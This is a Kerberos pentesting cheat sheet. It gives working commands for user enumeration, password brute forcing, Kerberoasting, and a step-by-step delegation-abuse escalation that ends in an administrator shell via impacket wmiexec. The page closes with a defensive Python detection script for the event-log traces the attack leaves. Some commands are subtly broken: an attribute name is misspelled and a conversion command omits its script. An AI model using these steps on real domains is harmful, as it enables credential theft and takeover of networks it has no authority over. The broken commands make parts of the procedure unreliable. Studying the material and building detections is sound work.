Kerberos Pentesting

Last modified: 2023-08-26

Active Directory Privilege Escalation Windows

Kerberos is an authentication protocol used to verify the identity of a user or host. It relies on cryptography for authentication and consists of three parties: the client, the server, and the Key Distribution Center (KDC). The default port is 88; Kerberos also uses port 464 for password changes.


To enumerate users automatically, you can use nmap's krb5-enum-users script.

nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local' -p 88 <target-ip>

Brute Force Authentication

Kerbrute is a tool to perform Kerberos pre-auth brute forcing.
The wordlist (e.g. combos.txt) passed to bruteforce mode must contain "username:password" combinations.

# -v: verbose mode. It is recommended to add this flag, otherwise we cannot confirm whether the user exists or not.
# --dc: domain controller (IP or hostname)
# -d: domain
# combos.txt: the wordlist must contain "username:password" combinations.
kerbrute bruteforce -v --dc <dc-ip> -d example.domain combos.txt

# User enumeration
kerbrute userenum -v --dc <dc-ip> -d example.domain usernames.txt

# Brute force a single user's password
kerbrute bruteuser -v --dc <dc-ip> -d example.domain passwords.txt username

Also, see AS-REP Roasting to find password hashes.

Kerberoasting Attack

Kerberoasting is an attack technique that uses a credential already gathered to request service tickets for accounts with an SPN, so that the service account passwords can be cracked offline.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt

Privilege Escalation with Kerberos

First, download the two PowerShell scripts (PowerView.ps1 and Powermad.ps1) to your local machine.

Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1

1. Check User's Permission and Windows Versions

Check whether users are allowed to create new computer objects in the domain (ms-ds-machineaccountquota must be greater than 0).

Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com

# -------------------------
# Result
ms-ds-machineaccountquota: 10

Also check that the target machine runs at least Windows Server 2012.


# -------------------------
# Result
OSVersion: Windows Server 2022 Standard

Additionally, check whether the target computer already has the attribute "msds-allowedtoactonbehalfofotheridentity" set.

Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity

# ------------------
# Result
name msds-allowedtoactionbehalfofotheridentity
---- ----------------------------------------
<HOSTNAME>   {1, 0, 4, 128...}

2. Create a New Computer

Now you can create a new computer object.

New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01

# ----------------------
# Result (copy the objectsid)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103

Create a new raw security descriptor that grants the new machine account full rights, and write it to the target computer's msds-allowedtoactonbehalfofotheridentity attribute.

# Paste the objectsid that was copied in the previous step.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose

3. Impersonate to Get a Ticket

Download Rubeus.exe to your local machine.

Then upload it to the target machine and generate an RC4 (NTLM) hash of the machine account's password.

# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /domain:<domain>

# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4

We can now request a Kerberos service ticket as the new machine account while impersonating the administrator (S4U2Self followed by S4U2Proxy).

.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname> /ptt

# --------------
# Result (copy the long base64 blob at the end of the output)

Then write the ticket to a .kirbi file and download it.

[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi

4. Make the Ticket Usable and Use It

Download the ticket converter script to your local machine.

Destroy any existing tickets on the local machine, convert the .kirbi ticket to a ccache that Linux tools can use, then point KRB5CCNAME at the new ticket.

python3 ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

We can use the ticket to get a shell. The hostname must match the SPN in the ticket.

impacket-wmiexec -k -no-pass example.local/administrator@<hostname>
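From the defender's side, steps 2 and 3 above leave traces in the Security log: event 4741 when the new computer account is created, and event 5136 when msDS-AllowedToActOnBehalfOfOtherIdentity is written (with directory service object auditing enabled). The following Python is an added detection example, not part of the original page; the event records are constructed, and their field names follow the Windows Security log schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names follow the Windows
# Security log: 4741 = computer account created, 5136 = directory object modified.
SAMPLE_EVENTS = [
    {"EventID": 4741, "Time": "2023-08-26T10:00:00", "SubjectUserName": "jdoe",
     "TargetUserName": "TEST01$"},
    {"EventID": 5136, "Time": "2023-08-26T10:03:00", "SubjectUserName": "jdoe",
     "ObjectDN": "CN=FILESRV,CN=Computers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
    {"EventID": 5136, "Time": "2023-08-26T11:00:00", "SubjectUserName": "svc_deploy",
     "ObjectDN": "CN=WS01,CN=Computers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    {"EventID": 5136, "Time": "2023-08-26T12:00:00", "SubjectUserName": "da_admin",
     "ObjectDN": "CN=APP01,CN=Computers,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "%%14674"},
]

RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"

def find_rbcd_setup(events, window=timedelta(hours=1)):
    """Flag every write to the RBCD attribute; raise severity to high when the
    same principal created a machine account within `window` beforehand."""
    created = defaultdict(list)   # actor -> [(time, new computer account)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        actor = ev["SubjectUserName"].lower()
        if ev["EventID"] == 4741:
            created[actor].append((when, ev["TargetUserName"]))
        elif (ev["EventID"] == 5136
              and ev.get("AttributeLDAPDisplayName", "").lower() == RBCD_ATTR
              and ev.get("OperationType") == VALUE_ADDED):
            recent = [name for t, name in created[actor] if when - t <= window]
            alerts.append({
                "actor": actor,
                "target": ev["ObjectDN"],
                "new_accounts": recent,
                "severity": "high" if recent else "medium",
            })
    return alerts

if __name__ == "__main__":
    for alert in find_rbcd_setup(SAMPLE_EVENTS):
        print(alert)
```

Every RBCD attribute write is worth a review (medium), since legitimate use is rare; the combination with a fresh machine account from the same principal is the pattern this page's procedure produces.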